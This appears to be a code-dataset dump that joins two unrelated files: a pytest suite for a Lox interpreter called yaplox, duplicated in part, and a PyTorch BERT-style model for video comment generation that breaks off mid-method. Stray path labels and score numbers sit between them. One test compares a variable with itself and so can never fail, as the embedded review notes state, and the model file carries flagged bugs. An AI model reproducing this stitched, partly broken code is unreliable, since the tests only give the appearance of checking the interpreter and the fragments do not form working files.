(10, TokenType.SLASH, 2, 5),
(10, TokenType.SLASH, 3, 3.3333333333333335),
(5, TokenType.STAR, 5, 25),
(5, TokenType.STAR, 0, 0),
(2, TokenType.PLUS, 2, 4),
("Foo", TokenType.PLUS, "Bar", "FooBar"),
],
)
def test_visit_binary_expr(
self, create_token_factory, left, token_type, right, expected
):
operator = create_token_factory(token_type=token_type)
expr_left = Literal(left)
expr_right = Literal(right)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
result = Interpreter().visit_binary_expr(expr)
if isinstance(expected, bool):
assert result is expected
else:
assert result == expected
@pytest.mark.parametrize(
("left", "token_type", "right"),
[
(10, TokenType.MINUS, "String"),
(10, TokenType.GREATER, "Foo"),
("43", TokenType.PLUS, 18),
(43, TokenType.PLUS, "18"),
],
)
def test_binary_expression_failing(
self, create_token_factory, left, token_type, right
):
operator = create_token_factory(token_type=token_type)
expr_left = Literal(left)
expr_right = Literal(right)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
with pytest.raises(YaploxRuntimeError):
Interpreter().visit_binary_expr(expr)
def test_nested_binary_expr(self, create_token_factory, mocker):
""" Test nested binary expressions, 4 * 6 / 2 """
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
test_string = "4 * 6 / 2;"
scanner = Scanner(test_string, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
expr: Expression = statements[0].expression
assert isinstance(expr, Binary)
assert isinstance(expr.left, Binary)
assert isinstance(expr.right, Literal)
assert expr.operator.token_type == TokenType.SLASH
assert expr.right.value == 2.0
# Left will be 4 * 6
assert expr.left.operator.token_type == TokenType.STAR
assert expr.left.left.value == 4
assert expr.left.right.value == 6
result = Interpreter().visit_binary_expr(expr)
assert result == 12
def test_unknown_operator(self, create_token_factory):
operator = create_token_factory(token_type=TokenType.EOF)
expr_left = Literal(None)
expr_right = Literal(None)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
with pytest.raises(YaploxRuntimeError):
Interpreter().visit_binary_expr(expr)
    @pytest.mark.parametrize(
        ("expression", "result"),
        [
            ("4 * 6 / 2;", "12"),
            ("12 < 6;", "False"),
            ("12 > 6;", "True"),
            ("3 + 3;", "6"),
        ],
    )
    def test_interpret(self, mocker, expression, result):
        """End-to-end smoke test: scan, parse and interpret an expression.

        NOTE(review): the assignment below rebinds the `result` parameter, so
        the final assert compares the interpreter's output to itself and can
        never fail -- the expected strings in the parametrize table are
        effectively unused.  Rename the local (e.g. `actual`) and compare it
        against the expected value (via the interpreter's stringify, given
        the string expectations).
        """
        on_scanner_error_mock = mocker.MagicMock()
        on_parser_error_mock = mocker.MagicMock()
        scanner = Scanner(expression, on_error=on_scanner_error_mock)
        tokens = scanner.scan_tokens()
        parser = Parser(tokens, on_token_error=on_parser_error_mock)
        statements = parser.parse()
        result = Interpreter().interpret(statements)
        assert result == result
def test_interpret_error(self, mocker):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
on_interpret_error_mock = mocker.MagicMock()
expression = '0 + "Foo";'
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
Interpreter().interpret(statements, on_error=on_interpret_error_mock)
# There will be an error
assert on_interpret_error_mock.called
assert "Operands must be two numbers or two strings" in str(
on_interpret_error_mock.call_args
)
def test_assignment(self, mocker):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
on_interpret_error_mock = mocker.MagicMock()
lines = [
"var a = 0;",
"var c = a;",
"var b;",
"a = 3 + 6;",
"b = 3 / 6;",
"a = a + b;",
"print(a);",
"a;",
]
expression = "\n".join(lines)
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
result = Interpreter().interpret(statements, on_error=on_interpret_error_mock)
assert result == 9.5
def test_stringify(self, run_code_lines):
lines = [
"var a;",
"print(a);",
]
assert run_code_lines(lines).out == "nil\n" | tests/test_interpreter.py | import pytest
from yaplox.expr import Binary, Grouping, Literal, Unary
from yaplox.interpreter import Interpreter
from yaplox.parser import Parser
from yaplox.scanner import Scanner
from yaplox.stmt import Expression
from yaplox.token_type import TokenType
from yaplox.yaplox_runtime_error import YaploxRuntimeError
class TestInterpreter:
def test_visit_grouping_expr(self):
nested = Literal("18")
expr = Grouping(nested)
result = Interpreter().visit_grouping_expr(expr)
assert result == nested.value
def test_visit_literal_expr(self):
expr = Literal("42")
result = Interpreter().visit_literal_expr(expr)
assert result == "42"
@pytest.mark.parametrize(
("token_type", "literal", "expected"),
[
(TokenType.MINUS, 34, -34.0),
(TokenType.MINUS, -42, 42.0),
(TokenType.MINUS, -0, 0.0),
(TokenType.MINUS, 0, -0.0),
(TokenType.BANG, False, True),
(TokenType.BANG, True, False),
(TokenType.BANG, None, True), # !None == True
(TokenType.BANG, "Stringy", False),
(TokenType.BANG, "", False),
(TokenType.BANG, 0, False),
(TokenType.BANG, "0", False),
],
)
def test_visit_unary_expr(
self, create_token_factory, token_type, literal, expected
):
token = create_token_factory(token_type=token_type)
expr = Unary(token, right=Literal(literal))
result = Interpreter().visit_unary_expr(expr)
if isinstance(expected, bool):
assert result is expected
else:
assert result == expected
def test_visit_unary_sad_flow(self, create_token_factory):
# -"Foo" Should result in an error
token = create_token_factory(token_type=TokenType.MINUS)
expr = Unary(token, right=Literal("Foo"))
with pytest.raises(YaploxRuntimeError) as excinfo:
Interpreter().visit_unary_expr(expr)
assert "Foo must be a number" in str(excinfo.value)
@pytest.mark.parametrize(
("left", "token_type", "right", "expected"),
[
(10, TokenType.GREATER, 7, True),
(10, TokenType.GREATER_EQUAL, 10, True),
(7, TokenType.LESS, 10, True),
(7, TokenType.LESS_EQUAL, 7, True),
(7, TokenType.BANG_EQUAL, 7, False),
(7, TokenType.BANG_EQUAL, 10, True),
(None, TokenType.BANG_EQUAL, None, False), # None !=None
(None, TokenType.EQUAL_EQUAL, None, True), # None ==None
(None, TokenType.BANG_EQUAL, 5, True), # None != 5
(None, TokenType.EQUAL_EQUAL, 5, False), # None == 5
(5, TokenType.EQUAL_EQUAL, None, False), # 5 == None
("FooBar", TokenType.BANG_EQUAL, "BarFoo", True),
("FooBar", TokenType.EQUAL_EQUAL, "BarFoo", False),
("FooBar", TokenType.BANG_EQUAL, "FooBar", False),
("FooBar", TokenType.EQUAL_EQUAL, "FooBar", True),
(10, TokenType.MINUS, 7, 3),
(10, TokenType.MINUS, 20, -10),
(10, TokenType.MINUS, 20, -10),
(10, TokenType.SLASH, 2, 5),
(10, TokenType.SLASH, 3, 3.3333333333333335),
(5, TokenType.STAR, 5, 25),
(5, TokenType.STAR, 0, 0),
(2, TokenType.PLUS, 2, 4),
("Foo", TokenType.PLUS, "Bar", "FooBar"),
],
)
def test_visit_binary_expr(
self, create_token_factory, left, token_type, right, expected
):
operator = create_token_factory(token_type=token_type)
expr_left = Literal(left)
expr_right = Literal(right)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
result = Interpreter().visit_binary_expr(expr)
if isinstance(expected, bool):
assert result is expected
else:
assert result == expected
@pytest.mark.parametrize(
("left", "token_type", "right"),
[
(10, TokenType.MINUS, "String"),
(10, TokenType.GREATER, "Foo"),
("43", TokenType.PLUS, 18),
(43, TokenType.PLUS, "18"),
],
)
def test_binary_expression_failing(
self, create_token_factory, left, token_type, right
):
operator = create_token_factory(token_type=token_type)
expr_left = Literal(left)
expr_right = Literal(right)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
with pytest.raises(YaploxRuntimeError):
Interpreter().visit_binary_expr(expr)
def test_nested_binary_expr(self, create_token_factory, mocker):
""" Test nested binary expressions, 4 * 6 / 2 """
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
test_string = "4 * 6 / 2;"
scanner = Scanner(test_string, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
expr: Expression = statements[0].expression
assert isinstance(expr, Binary)
assert isinstance(expr.left, Binary)
assert isinstance(expr.right, Literal)
assert expr.operator.token_type == TokenType.SLASH
assert expr.right.value == 2.0
# Left will be 4 * 6
assert expr.left.operator.token_type == TokenType.STAR
assert expr.left.left.value == 4
assert expr.left.right.value == 6
result = Interpreter().visit_binary_expr(expr)
assert result == 12
def test_unknown_operator(self, create_token_factory):
operator = create_token_factory(token_type=TokenType.EOF)
expr_left = Literal(None)
expr_right = Literal(None)
expr = Binary(left=expr_left, operator=operator, right=expr_right)
with pytest.raises(YaploxRuntimeError):
Interpreter().visit_binary_expr(expr)
@pytest.mark.parametrize(
("expression", "result"),
[
("4 * 6 / 2;", "12"),
("12 < 6;", "False"),
("12 > 6;", "True"),
("3 + 3;", "6"),
],
)
def test_interpret(self, mocker, expression, result):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
result = Interpreter().interpret(statements)
assert result == result
def test_interpret_error(self, mocker):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
on_interpret_error_mock = mocker.MagicMock()
expression = '0 + "Foo";'
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
Interpreter().interpret(statements, on_error=on_interpret_error_mock)
# There will be an error
assert on_interpret_error_mock.called
assert "Operands must be two numbers or two strings" in str(
on_interpret_error_mock.call_args
)
def test_assignment(self, mocker):
on_scanner_error_mock = mocker.MagicMock()
on_parser_error_mock = mocker.MagicMock()
on_interpret_error_mock = mocker.MagicMock()
lines = [
"var a = 0;",
"var c = a;",
"var b;",
"a = 3 + 6;",
"b = 3 / 6;",
"a = a + b;",
"print(a);",
"a;",
]
expression = "\n".join(lines)
scanner = Scanner(expression, on_error=on_scanner_error_mock)
tokens = scanner.scan_tokens()
parser = Parser(tokens, on_token_error=on_parser_error_mock)
statements = parser.parse()
result = Interpreter().interpret(statements, on_error=on_interpret_error_mock)
assert result == 9.5
def test_stringify(self, run_code_lines):
lines = [
"var a;",
"print(a);",
]
assert run_code_lines(lines).out == "nil\n" | 0.569134 | 0.617167 |
import torch
import torch.nn as nn
import torch.nn.functional as F
import os
import json
import random
from typing import NamedTuple, Optional, Iterable, Tuple
from transformers import BertModel, BertPreTrainedModel
from transformers.modeling_bert import BertLMPredictionHead, ACT2FN
from transformers.configuration_bert import BertConfig
from transformers.modeling_outputs import BaseModelOutputWithPooling
BertLayerNorm = nn.LayerNorm
class Config(NamedTuple):
    """Configuration for BERT model (hyper-parameters and sequence limits)."""
    vocab_size: int = 40443 # Size of Vocabulary
    dim: int = 1024 # Dimension of Hidden Layer in Transformer Encoder
    layers: int = 12 # Number of Encoder Layers
    n_heads: int = 8 # Number of Heads in Multi-Headed Attention Layers
    dim_ff: int = 768*4 # Dimension of Intermediate Layers in Positionwise Feedforward Net
    p_drop_hidden: float = 0.3 # Probability of Dropout of various Hidden Layers
    p_drop_attn: float = 0.3 # Probability of Dropout of Attention Layers
    max_n_clips: int = 10 # Maximum video clips for each comment
    max_comment_len: int = 56 # Maximum words for each comment
    max_comment_len_CMLM: int = 50
    max_pos_len_CMLM: int = 6
    max_context_len: int = 128 # Maximum words for context comments
    max_len : int = 196
    pair_loss_weight : float = 1.0
    next_sentence_loss_weight: float = 5
    pos_loss_weight: float = 1
    @classmethod
    def load_from_json(cls, file):
        """Build a Config from a JSON file; keys absent from the file keep
        their defaults.  Uses a context manager so the file handle is closed
        deterministically (the original leaked it)."""
        with open(file, "r") as fh:
            return cls(**json.load(fh))
class MyBertEmbeddings(nn.Module):
    """Construct the embeddings from word, position and token_type embeddings.

    Unlike stock BERT embeddings, ``forward`` splices precomputed visual
    features plus two extra embeddings (video-time and color) in front of the
    token embeddings.  Those tensors are read from ``self.visual``,
    ``self.video_time`` and ``self.color``, which are NOT created in
    ``__init__`` -- the caller must assign them on the instance before each
    forward pass.  NOTE(review): confirm this protocol; consider passing
    them as forward() arguments instead.
    """
    def __init__(self, config):
        super(MyBertEmbeddings, self).__init__()
        self.word_embeddings = nn.Embedding(config.vocab_size, config.hidden_size, padding_idx=config.pad_token_id)
        self.position_embeddings = nn.Embedding(config.max_position_embeddings, config.hidden_size)
        self.token_type_embeddings = nn.Embedding(config.type_vocab_size, config.hidden_size)
        # self.LayerNorm is not snake-cased to stick with TensorFlow model variable name and be able to load
        # any TensorFlow checkpoint file
        self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.layer_norm_eps)
        self.dropout = nn.Dropout(config.hidden_dropout_prob)
        # position_ids (1, len position emb) is contiguous in memory and exported when serialized
        self.register_buffer("position_ids", torch.arange(config.max_position_embeddings).expand((1, -1)))
    def forward(self, input_ids=None, token_type_ids=None, position_ids=None, inputs_embeds=None):
        # input_shape keeps the *full* length (visual slots + text), so the
        # position/token-type embeddings below match the concatenated output.
        if input_ids is not None:
            input_shape = input_ids.size()
        else:
            input_shape = inputs_embeds.size()[:-1]
        #print("input_ids",input_ids[0,:])
        #print("token_type_ids",token_type_ids[0,:])
        #print("position_ids",position_ids[0,:])
        # Drop the leading slots of input_ids reserved for the visual clips
        # plus the two extra (video-time, color) positions; their embeddings
        # are concatenated back in below.
        input_ids = input_ids[:,self.visual.size()[1]+2:]
        seq_length = input_shape[1]
        if position_ids is None:
            position_ids = self.position_ids[:, :seq_length]
        if token_type_ids is None:
            token_type_ids = torch.zeros(input_shape, dtype=torch.long, device=self.position_ids.device)
        if inputs_embeds is None:
            inputs_embeds = self.word_embeddings(input_ids)
        # NOTE(review): these two lines rebind self.video_time / self.color to
        # their unsqueezed versions, so calling forward() twice without
        # re-assigning them would unsqueeze again and break the concat --
        # confirm the caller resets them every step.
        self.video_time = self.video_time.unsqueeze( dim=1)
        self.color = self.color.unsqueeze( dim=1)
        inputs_embeds = torch.cat([self.visual,self.video_time,self.color,inputs_embeds], dim=1)
        #visual_zeros = torch.zeros([self.visual.size()[0],self.visual.size()[1]+2], dtype=input_ids.dtype).to(torch.device("cuda"))
        #position_embeddings = self.position_embeddings(torch.cat([visual_zeros,position_ids], dim=1))
        #token_type_embeddings = self.token_type_embeddings(torch.cat([visual_zeros,token_type_ids], dim=1))
        position_embeddings = self.position_embeddings(position_ids)
        token_type_embeddings = self.token_type_embeddings(token_type_ids)
        # Sum the three embedding types, then LayerNorm + dropout (standard BERT).
        embeddings = inputs_embeds + position_embeddings + token_type_embeddings
        embeddings = self.LayerNorm(embeddings)
        embeddings = self.dropout(embeddings)
        #print("embeddings",embeddings[0,:])
        return embeddings
class MLPWithLayerNorm(nn.Module):
    """Two-layer MLP: (linear -> activation -> LayerNorm), applied twice."""

    def __init__(self, config, input_size):
        super(MLPWithLayerNorm, self).__init__()
        self.config = config
        # Resolve the activation once; config.hidden_act is either a name
        # registered in ACT2FN or a callable used as-is.
        act = ACT2FN[config.hidden_act] if isinstance(config.hidden_act, str) else config.hidden_act
        self.linear1 = nn.Linear(input_size, config.hidden_size)
        self.non_lin1 = act
        self.layer_norm1 = BertLayerNorm(config.hidden_size, eps=1e-12)
        self.linear2 = nn.Linear(config.hidden_size, config.hidden_size)
        self.non_lin2 = act
        self.layer_norm2 = BertLayerNorm(config.hidden_size, eps=1e-12)

    def forward(self, hidden):
        # Stage 1: project, activate, normalize.
        out = self.non_lin1(self.linear1(hidden))
        out = self.layer_norm1(out)
        # Stage 2: same shape-preserving transform again.
        out = self.non_lin2(self.linear2(out))
        return self.layer_norm2(out)
class BertPairTargetPredictionHead(nn.Module):
    """SpanBERT-style pair-target head: score vocabulary tokens from the
    hidden states at three positions (left, here, right) of each pair."""

    def __init__(self, config):
        super(BertPairTargetPredictionHead, self).__init__()
        # MLP over the concatenated (left, right, here) hidden states.
        self.mlp_layer_norm = MLPWithLayerNorm(config, config.hidden_size * 3)
        # The output weights are the same as the input embeddings, but there is
        # an output-only bias for each token.
        self.decoder = nn.Linear(config.hidden_size, config.vocab_size, bias=False)
        self.bias = nn.Parameter(torch.zeros(config.vocab_size))

    def forward(self, hidden_states, pairs):
        # pairs: (bs, num_pairs, 3) holding (left, here, right) position indices.
        dim = hidden_states.size(-1)

        def states_at(positions):
            # Gather the (bs, num_pairs, dim) hidden states at `positions`.
            index = positions.unsqueeze(2).repeat(1, 1, dim)
            return torch.gather(hidden_states, 1, index)

        left_hidden = states_at(pairs[:, :, 0])
        here_hidden = states_at(pairs[:, :, 1])
        right_hidden = states_at(pairs[:, :, 2])
        # Concatenation order (left, right, here) matches the trained checkpoints.
        mixed = self.mlp_layer_norm(torch.cat((left_hidden, right_hidden, here_hidden), -1))
        # (bs, num_pairs, vocab_size) scores over the vocabulary.
        return self.decoder(mixed) + self.bias
class BertPreTrainingHeads(nn.Module):
    """Bundle of pre-training heads: token-level MLM plus the pair (SBO) head."""

    def __init__(self, config):
        super(BertPreTrainingHeads, self).__init__()
        self.predictions = BertLMPredictionHead(config)
        self.pair_target_predictions = BertPairTargetPredictionHead(config)

    def forward(self, sequence_output, pairs):
        # MLM scores for every position, then span-boundary scores per pair.
        lm_scores = self.predictions(sequence_output)
        sbo_scores = self.pair_target_predictions(sequence_output, pairs)
        return lm_scores, sbo_scores
class BertPreTrainingHeads_WithoutPair(BertPreTrainingHeads):
    """MLM head plus a 2-way sequence-relationship classifier (no pair head)."""

    def __init__(self, config):
        super(BertPreTrainingHeads_WithoutPair, self).__init__(config)
        # Discard the inherited SBO head; this variant classifies sentence order.
        self.pair_target_predictions = None
        self.seq_relationship = nn.Linear(config.hidden_size, 2)

    def forward(self, sequence_output, pooled_output):
        lm_scores = self.predictions(sequence_output)
        relationship_scores = self.seq_relationship(pooled_output)
        return lm_scores, relationship_scores
class BertPreTrainingHeads_WithPos(BertPreTrainingHeads):
    """MLM head plus a per-token position classifier over comment slots."""

    def __init__(self, config, model_cfg):
        super(BertPreTrainingHeads_WithPos, self).__init__(config)
        # Discard the inherited SBO head; predict positions instead.
        self.pair_target_predictions = None
        self.pos_pred = nn.Linear(config.hidden_size, model_cfg.max_comment_len_CMLM)

    def forward(self, sequence_output):
        # (bs, seq, vocab) MLM scores and (bs, seq, max_comment_len_CMLM) position scores.
        return self.predictions(sequence_output), self.pos_pred(sequence_output)
class MyBertModel(BertModel):
    """BertModel with the embeddings swapped for :class:`MyBertEmbeddings`.

    ``fix_mask`` and ``model_cfg`` feed the disabled attention-mask override
    kept below as dead code.
    """
    def __init__(self, config,fix_mask=False,model_cfg=None):
        super(MyBertModel, self).__init__(config)
        # Replace the stock embeddings with the visual/time/color-aware variant.
        self.embeddings = MyBertEmbeddings(config)
        self.fix_mask = fix_mask
        self.model_cfg = model_cfg
    # Dead code preserved verbatim: an earlier get_extended_attention_mask
    # override that, when fix_mask is set, blocked attention from the
    # position-prediction slots into the comment-token region.
    '''
    def get_extended_attention_mask(self, attention_mask, input_shape: Tuple[int], device=None):
        begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len
        if self.fix_mask:
            batch_size, seq_length = input_shape
            #seq_ids = torch.arange(seq_length, device=device)
            #causal_mask = seq_ids[None, None, :].repeat(batch_size, seq_length, 1) <= seq_ids[None, :, None]
            causal_mask = torch.ones((batch_size,seq_length,seq_length), device=attention_mask.device)
            causal_mask[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM,begin_pos+self.model_cfg.max_pos_len_CMLM:] = 0
            causal_mask = causal_mask.to(attention_mask.dtype)
            extended_attention_mask = causal_mask[:, None, :, :] * attention_mask[:, None, None, :]
        else:
            extended_attention_mask = attention_mask[:, None, None, :]
        #print("extended_attention_mask",extended_attention_mask[0,0,begin_pos-1:begin_pos+self.model_cfg.max_pos_len_CMLM+1,begin_pos+self.model_cfg.max_pos_len_CMLM-1:])
        # Since attention_mask is 1.0 for positions we want to attend and 0.0 for
        # masked positions, this operation will create a tensor which is 0.0 for
        # positions we want to attend and -10000.0 for masked positions.
        # Since we are adding it to the raw scores before the softmax, this is
        # effectively the same as removing these entirely.
        extended_attention_mask = extended_attention_mask.to(dtype=self.dtype)  # fp16 compatibility
        extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
        return extended_attention_mask
    '''
class MyCLVCG(BertPreTrainedModel):
    """CLVCG pre-training model: a BERT encoder over (visual, time, color,
    text) inputs with an MLM head plus a SpanBERT-style pair (SBO) head.
    """

    def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
        """Build a BertConfig from ``model_cfg`` and assemble encoder + heads.

        ``type`` shadows the builtin but is kept for interface compatibility.
        """
        config = BertConfig(
            vocab_size=model_cfg.vocab_size,
            hidden_size=model_cfg.dim,
            num_hidden_layers=model_cfg.layers,
            num_attention_heads=model_cfg.n_heads,
            intermediate_size=model_cfg.dim_ff,
            hidden_dropout_prob=model_cfg.p_drop_hidden,
            attention_probs_dropout_prob=model_cfg.p_drop_attn,
            max_position_embeddings=model_cfg.max_len,
            pad_token_id=pad_token_id,
            type_vocab_size=100,
        )
        super(MyCLVCG, self).__init__(config)
        self.config = config
        self.type = type
        self.model_cfg = model_cfg
        self.bert = MyBertModel(config)
        self.cls = BertPreTrainingHeads(config)
        self.pad_token_id = pad_token_id
        self.init_weights()
        self.tie_weights()
        # Optional per-token class weights for the CE losses; set externally.
        self.vocab_weight = None
        self.apply(self.inplace_gelu)

    def inplace_gelu(self, m):
        # Flip any *GeLU module to in-place mode to save activation memory.
        classname = m.__class__.__name__
        if classname.find('GeLU') != -1:
            m.inplace = True

    def tie_weights(self):
        """ Make sure we are sharing the input and output embeddings.
            Export to TorchScript can't handle parameter sharing so we are cloning them instead.
        """
        self._tie_or_clone_weights(self.cls.predictions.decoder,
                                   self.bert.embeddings.word_embeddings)

    def forward(self, input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual, color, video_time, pairs, pair_targets, head_mask=None, is_training=True):
        """Run the encoder and both heads.

        Returns ``(loss, prediction_scores, pair_target_scores)``; ``loss``
        is None when ``masked_lm_labels`` is None.
        """
        # The custom embeddings read these attributes; they must be refreshed
        # on every call because MyBertEmbeddings.forward mutates them.
        self.bert.embeddings.visual = visual
        self.bert.embeddings.color = color
        self.bert.embeddings.video_time = video_time
        outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
                            attention_mask=attention_mask, head_mask=head_mask)
        sequence_output = outputs[0]
        prediction_scores, pair_target_scores = self.cls(sequence_output, pairs)
        if self.vocab_weight is None:
            loss_fct = nn.CrossEntropyLoss(ignore_index=-1, reduction='none')
        else:
            loss_fct = nn.CrossEntropyLoss(ignore_index=-1, reduction='none', weight=self.vocab_weight)
        if masked_lm_labels is not None:
            masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
            # Normalize both losses by the number of non-ignored MLM tokens.
            # NOTE(review): ntokens == 0 (no masked positions in the batch)
            # would divide by zero -- assumed impossible upstream, confirm.
            ntokens = torch.sum(torch.ne(masked_lm_labels, -1))
            masked_lm_loss = torch.sum(masked_lm_loss) / ntokens
            # SBO (span-boundary objective) loss over the sampled pairs.
            pair_loss = loss_fct(
                pair_target_scores.view(-1, self.config.vocab_size),
                pair_targets.view(-1)
            )
            pair_loss = torch.sum(pair_loss) / ntokens
            loss = masked_lm_loss + self.model_cfg.pair_loss_weight * pair_loss
        else:
            # Bug fix: `loss` was previously unbound on this path, so the
            # return below raised NameError whenever labels were omitted.
            loss = None
        return loss, prediction_scores, pair_target_scores  # , outputs[2:]
class MyCLVCG_POINTER(MyCLVCG):
    """CLVCG variant with an MLM head plus a 2-way next-sentence ("pointer")
    classifier instead of the pair head."""

    def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
        """Assemble the base model, then swap in the no-pair heads.

        Bug fix: the base-class call previously dropped ``type`` and
        ``pad_token_id`` (so the encoder could be built with a different pad
        id than the heads), and a second, redundant BertConfig was built
        locally.  Forward the arguments and reuse the parent's config.
        """
        super(MyCLVCG_POINTER, self).__init__(model_cfg, type=type, pad_token_id=pad_token_id)
        self.cls = BertPreTrainingHeads_WithoutPair(self.config)
        # Re-tie because the MLM decoder was just replaced.
        self.tie_weights()

    def forward(self, input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual, color, video_time, next_sentence_label=None, head_mask=None, is_training=True):
        """Return (total_loss, weighted_ns_loss, prediction_scores, seq_relationship_score)."""
        # The custom embeddings read these attributes on every call.
        self.bert.embeddings.visual = visual
        self.bert.embeddings.color = color
        self.bert.embeddings.video_time = video_time
        outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
                            attention_mask=attention_mask, head_mask=head_mask)
        sequence_output = outputs[0]
        # Pooled "CLS" state: the first token after the context segment.
        cls_output = sequence_output[:, self.model_cfg.max_context_len]
        prediction_scores, seq_relationship_score = self.cls(sequence_output, cls_output)
        loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
        masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
        total_loss = masked_lm_loss
        # Bug fix: torch.LongTensor(0) built an *empty* int64 tensor, not a
        # zero scalar, so the no-label return value was an empty tensor.
        next_sentence_loss = torch.zeros((), device=total_loss.device)
        if next_sentence_label is not None:
            next_sentence_loss = loss_fct(seq_relationship_score.view(-1, 2), next_sentence_label.view(-1))
            # Out-of-place add keeps the autograd graph tidy.
            total_loss = total_loss + self.model_cfg.next_sentence_loss_weight * next_sentence_loss
        return total_loss, self.model_cfg.next_sentence_loss_weight * next_sentence_loss, prediction_scores, seq_relationship_score
class MyCLVCG_CMLM(MyCLVCG):
    """CLVCG variant trained with a conditional-MLM objective plus a
    per-token position-prediction loss."""
    def __init__(self, model_cfg, type="pretrain", pad_token_id=0):
        # NOTE(review): this config duplicates the one the parent builds, and
        # the super() call below drops `type`/`pad_token_id` -- confirm intended.
        config = BertConfig(
            vocab_size = model_cfg.vocab_size,
            hidden_size = model_cfg.dim,
            num_hidden_layers = model_cfg.layers,
            num_attention_heads = model_cfg.n_heads,
            intermediate_size = model_cfg.dim_ff,
            hidden_dropout_prob = model_cfg.p_drop_hidden,
            attention_probs_dropout_prob = model_cfg.p_drop_attn,
            max_position_embeddings = model_cfg.max_len,
            pad_token_id=pad_token_id,
            type_vocab_size = 100,
        )
        super(MyCLVCG_CMLM, self).__init__(model_cfg)
        # Replace encoder (fixed-mask variant) and heads (MLM + position).
        self.bert = MyBertModel(config,fix_mask=True,model_cfg=model_cfg)
        self.cls = BertPreTrainingHeads_WithPos(config,model_cfg)
        self.tie_weights()
    def forward(self,input_ids, attention_mask, position_ids, segment_ids, masked_lm_labels, visual=None, color=None, video_time=None, pos_labels = None, head_mask=None, is_training=True):
        """Return (total_loss, weighted_pos_loss, mlm_scores, pos_scores
        restricted to the position-prediction slots)."""
        # Dead debug dump kept verbatim below.
        '''
        begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len + self.model_cfg.max_pos_len_CMLM
        print("input_ids0",input_ids[0,begin_pos:])
        print("input_ids1",input_ids[1,begin_pos:])
        print("input_ids0",input_ids[0,self.model_cfg.max_n_clips + 2:])
        print("input_ids1",input_ids[1,self.model_cfg.max_n_clips + 2:])
        print("attention_mask",attention_mask[1,:])
        print("position_ids",position_ids[1,:])
        print("segment_ids",segment_ids[1,:])
        print("visual",visual[1,:])
        print("color",color[1,:])
        print("video_time",video_time[1,:])
        print("head_mask",head_mask)
        print("masked_lm_labels",masked_lm_labels[1,self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len:])
        print("pos_labels",pos_labels[1,self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len:])
        '''
        # The custom embeddings read these attributes on every call.
        self.bert.embeddings.visual = visual
        self.bert.embeddings.color = color
        self.bert.embeddings.video_time = video_time
        #print(input_ids[:,self.model_cfg.max_context_len])
        outputs = self.bert(input_ids, position_ids=position_ids, token_type_ids=segment_ids,
                            attention_mask=attention_mask, head_mask=head_mask)
        sequence_output = outputs[0]
        prediction_scores, seq_pos_score = self.cls(sequence_output)
        loss_fct = nn.CrossEntropyLoss(ignore_index=-1)
        #print(prediction_scores.view(-1, self.config.vocab_size))
        #print(masked_lm_labels.view(-1))
        masked_lm_loss = loss_fct(prediction_scores.view(-1, self.config.vocab_size), masked_lm_labels.view(-1))
        total_loss = masked_lm_loss
        pos_loss = loss_fct(seq_pos_score.view(-1, self.model_cfg.max_comment_len_CMLM), pos_labels.view(-1))
        total_loss += self.model_cfg.pos_loss_weight * pos_loss
        # First index of the position-prediction slots in the sequence.
        begin_pos = self.model_cfg.max_n_clips + 2 + self.model_cfg.max_context_len
        '''
        print("sequence_output",sequence_output[0,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM])
        pos = seq_pos_score[:,begin_pos:begin_pos+self.model_cfg.max_pos_len_CMLM]
        print("pos_pred",pos.argmax(dim=2)[0])
        print("pos_labels0",pos_labels[0,begin_pos:])
        print("pos_labels1",pos_labels[1,begin_pos:])
        print("masked_lm_labels0",masked_lm_labels[0,begin_pos:])
        print("masked_lm_labels1",masked_lm_labels[1,begin_pos:])
        print("\n\n")
        os._exit(0)
        '''
        # NOTE(review): the trailing "| models.py | import torch" on the next
        # line is dataset-extraction residue fused onto the return statement.
